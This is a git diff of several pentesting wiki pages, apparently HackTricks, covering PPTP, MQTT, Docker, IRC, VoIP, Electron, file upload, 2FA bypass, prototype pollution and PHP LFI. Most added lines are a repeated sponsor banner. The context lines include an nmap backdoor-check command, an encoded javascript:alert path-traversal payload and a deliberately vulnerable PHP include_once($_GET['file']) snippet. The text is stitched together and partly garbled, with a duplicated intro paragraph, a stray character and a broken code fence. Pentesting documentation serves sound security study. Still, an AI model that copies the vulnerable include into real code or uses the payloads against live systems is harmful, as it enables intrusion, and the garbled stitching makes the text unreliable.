**Point-to-Point Tunneling Protocol (PPTP)** is a method widely employed for **remote access** to mobile devices. It utilizes **TCP port 1723** for the exchange of keys, while **IP protocol 47** (Generic Routing Encapsulation, or **GRE**), is used to encrypt the data that is transmitted between peers. This setup is crucial for establishing a secure communication channel over the internet, ensuring that the data exchanged remains confidential and protected from unauthorized access.
|
**Point-to-Point Tunneling Protocol (PPTP)** is a method widely employed for **remote access** to mobile devices. It utilizes **TCP port 1723** for the exchange of keys, while **IP protocol 47** (Generic Routing Encapsulation, or **GRE**), is used to encrypt the data that is transmitted between peers. This setup is crucial for establishing a secure communication channel over the internet, ensuring that the data exchanged remains confidential and protected from unauthorized access.
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Basic Information
|
## Basic Information
|
||||||
|
|
||||||
**MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minimizing the usage of network bandwidth and reducing the demand on device resources. Additionally, it aims to maintain reliable communication and provide a certain level of delivery assurance. These goals make MQTT exceptionally suitable for the burgeoning field of **machine-to-machine (M2M) communication** and the **Internet of Things (IoT)**, where it's essential to connect a myriad of devices efficiently. Moreover, MQTT is highly beneficial for mobile applications, where conserving bandwidth and battery life is crucial.
|
**MQ Telemetry Transport (MQTT)** is known as a **publish/subscribe messaging protocol** that stands out for its extreme simplicity and lightness. This protocol is specifically tailored for environments where devices have limited capabilities and operate over networks that are characterized by low bandwidth, high latency, or unreliable connections. The core objectives of MQTT include minimizing the usage of network bandwidth and reducing the demand on device resources. Additionally, it aims to maintain reliable communication and provide a certain level of delivery assurance. These goals make MQTT exceptionally suitable for the burgeoning field of **machine-to-machine (M2M) communication** and the **Internet of Things (IoT)**, where it's essential to connect a myriad of devices efficiently. Moreover, MQTT is highly beneficial for mobile applications, where conserving bandwidth and battery life is crucial.
|
||||||
|
@ -136,6 +150,18 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header
|
||||||
|
|
||||||
* `port:1883 MQTT`
|
* `port:1883 MQTT`
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
### Docker Basics
|
### Docker Basics
|
||||||
|
|
||||||
#### What is
|
#### What is
|
||||||
|
@ -348,6 +362,20 @@ You can use auditd to monitor docker.
|
||||||
* [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
|
* [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
|
||||||
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Basic Information
|
## Basic Information
|
||||||
|
|
||||||
IRC, initially a **plain text protocol**, was assigned **194/TCP** by IANA but is commonly run on **6667/TCP** and similar ports to avoid needing **root privileges** for operation.
|
IRC, initially a **plain text protocol**, was assigned **194/TCP** by IANA but is commonly run on **6667/TCP** and similar ports to avoid needing **root privileges** for operation.
|
||||||
|
@ -93,6 +107,19 @@ nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,66
|
||||||
|
|
||||||
* `looking up your hostname`
|
* `looking up your hostname`
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Signaling Protocols
|
## Signaling Protocols
|
||||||
|
|
||||||
### SIP (Session Initiation Protocol)
|
### SIP (Session Initiation Protocol)
|
||||||
|
@ -106,6 +120,18 @@ SDP's simplicity and flexibility make it a widely adopted standard for describin
|
||||||
|
|
||||||
These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks.
|
These protocols play essential roles in **delivering and securing real-time multimedia communication over IP networks**. While RTP and RTCP handle the actual media transmission and quality monitoring, SRTP and ZRTP ensure that the transmitted media is protected against eavesdropping, tampering, and replay attacks.
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Introduction
|
## Introduction
|
||||||
|
|
||||||
Electron combines a local backend (with **NodeJS**) and a frontend (**Chromium**), although tt lacks some the security mechanisms of modern browsers.
|
Electron combines a local backend (with **NodeJS**) and a frontend (**Chromium**), although tt lacks some the security mechanisms of modern browsers.
|
||||||
|
@ -335,6 +349,18 @@ npm start
|
||||||
* More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
* More researches and write-ups about Electron security in [https://github.com/doyensec/awesome-electronjs-hacking](https://github.com/doyensec/awesome-electronjs-hacking)
|
||||||
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
* [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
Test executable file extensions:
|
Test executable file extensions:
|
||||||
|
|
||||||
* asp
|
* asp
|
||||||
|
@ -284,6 +298,18 @@ HTTP/1.1 401 Unauthorized
|
||||||
HTTP/1.1 200 OK
|
HTTP/1.1 200 OK
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## **Enhanced Two-Factor Authentication Bypass Techniques**
|
## **Enhanced Two-Factor Authentication Bypass Techniques**
|
||||||
|
|
||||||
### **Direct Endpoint Access**
|
### **Direct Endpoint Access**
|
||||||
|
@ -131,6 +145,19 @@ Utilizing decoy requests to obfuscate brute force attempts or mislead rate limit
|
||||||
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
|
* [https://medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35](https://github.com/carlospolop/hacktricks/blob/master/pentesting-web/%22https:/medium.com/@iSecMax/two-factor-authentication-security-testing-and-possible-bypasses-f65650412b35%22/README.md)
|
||||||
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
|
* [https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718](https://azwi.medium.com/2-factor-authentication-bypass-3b2bbd907718)
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
P
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,19 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
# Summary
|
# Summary
|
||||||
|
|
||||||
|
@ -98,6 +111,17 @@ javascript:alert(1)%252f%252f..%252fcss-images
|
||||||
|
|
||||||
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
{% embed url="https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/ssti.txt" %}
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
|
|
@ -14,6 +14,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Serve XSS responses
|
## Serve XSS responses
|
||||||
|
|
||||||
**For further details [take a look to the original reserach](https://portswigger.net/research/server-side-prototype-pollution)**
|
**For further details [take a look to the original reserach](https://portswigger.net/research/server-side-prototype-pollution)**
|
||||||
|
@ -134,6 +148,19 @@ You could definitely use it in a bug **chain** to exploit a **prototype pollutio
|
||||||
|
|
||||||
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
* [https://portswigger.net/research/server-side-prototype-pollution](https://portswigger.net/research/server-side-prototype-pollution)
|
||||||
|
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -14,6 +14,19 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## `compress.zlib://` and `PHP_STREAM_PREFER_STDIO`
|
## `compress.zlib://` and `PHP_STREAM_PREFER_STDIO`
|
||||||
|
|
||||||
|
@ -53,6 +66,17 @@ However, there is a check in the web server that **prevents loading files that c
|
||||||
|
|
||||||
For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
For more information check the description of the Race Condition and the CTF in [https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer](https://balsn.tw/ctf\_writeup/20191228-hxp36c3ctf/#includer)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
|
|
|
@ -14,13 +14,27 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
|
---
|
||||||
|
|
||||||
## Vulnerable configuration
|
## Vulnerable configuration
|
||||||
|
|
||||||
**[Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
|
**[Example from https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)**
|
||||||
|
|
||||||
* PHP code:
|
* PHP code:
|
||||||
|
|
||||||
```
|
````h`
|
||||||
<?php include_once($_GET['file']);
|
<?php include_once($_GET['file']);
|
||||||
```
|
```
|
||||||
|
|
||||||
|
@ -35,7 +49,7 @@ php_admin_value[file_uploads] = 0
|
||||||
|
|
||||||
* Setup / hardening:
|
* Setup / hardening:
|
||||||
|
|
||||||
```
|
```bash
|
||||||
...
|
...
|
||||||
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
|
chown -R 0:0 /tmp /var/tmp /var/lib/php/sessions
|
||||||
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
|
chmod -R 000 /tmp /var/tmp /var/lib/php/sessions
|
||||||
|
@ -294,6 +308,18 @@ if __name__ == "__main__":
|
||||||
|
|
||||||
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
* [https://bierbaumer.net/security/php-lfi-with-nginx-assistance/](https://bierbaumer.net/security/php-lfi-with-nginx-assistance/)
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
||||||
<details>
|
<details>
|
||||||
|
|
||||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||||
|
|
|
@ -16,6 +16,20 @@ Other ways to support HackTricks:
|
||||||
|
|
||||||
</details>
|
</details>
|
||||||
|
|
||||||
|
## WhiteIntel
|
||||||
|
|
||||||
|
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||||
|
|
||||||
|
[**WhiteIntel**](https://whiteintel.io) is a **dark-web** fueled search engine that offers **free** functionalities to check if a company or its customers have been **compromised** by **stealer malwares**.
|
||||||
|
|
||||||
|
Their primary goal of WhiteIntel is to combat account takeovers and ransomware attacks resulting from information-stealing malware.
|
||||||
|
|
||||||
|
You can check their website and try their engine for **free** at:
|
||||||
|
|
||||||
|
{% embed url="https://whiteintel.io" %}
|
||||||
|
|
